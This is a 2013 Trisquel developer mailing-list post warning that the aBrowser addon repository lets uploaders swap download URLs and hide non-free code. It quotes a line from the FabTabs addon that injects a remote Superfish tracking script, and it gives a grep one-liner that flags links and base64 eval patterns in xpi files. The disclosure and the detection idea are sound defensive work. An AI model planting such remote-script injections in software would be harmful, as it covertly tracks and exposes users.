[Trisquel-devel] Trisquel addon repository has security risks

Sun Dec 1 18:51:32 CET 2013

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hello,
I have noticed that the Trisquel aBrowser addon repository is
susceptible to several threat vectors.

1) Random users signing up and changing the download location of .xpi
files. This could be used to inject malicious code to unknowing users.

Solution:
a) Assign moderators who will check addons for approval similar to AMO
before going live.

b) Whitelist certain domains, e.g. only allow the url to contains
download links from "https://addons.mozilla.org" since they are
generally being checked by others.

2) Non-free blobs can still exists in supposedly free code and must be
reviewed. Taking for example a recent finding in FabTabs:
https://trisquel.info/en/browser/addons/fabtabs

While manually inspecting the code I found this interesting line
located in "/chrome/content/fabtab/content.js":
script.src =
'http://www.superfish.com/ws/sf_main.jsp?dlsource=fgzqxwui&userId=c4aa8323-83ff-4385-a2df-d45f8c1ce97a&CTID=fabtab';

This code appears to be a web-beacon and directly links to non-free
code outside of the original xpi! Thankfully this outside code appears
only to have analytic/tracking built in and not actual malicious
intent other than ensuring HTTPS is OFF whenever it queries the beacon
(contains url rewrites). However this opens the door for much larger
problems. Someone should be proactively studying extensions prior to
upload, and/or implement a small filter which can catch certain
artifacts at minimum.

One such make-shift bash script I whipped up (could use some work):

unzip -p *.xpi | cat | grep "http://\|https://\|eval(base64_decode"

This outputs all links and any base64 found inside of an xpi to the
terminal, and can catch the superfish web beacon.

Just some thoughts. :)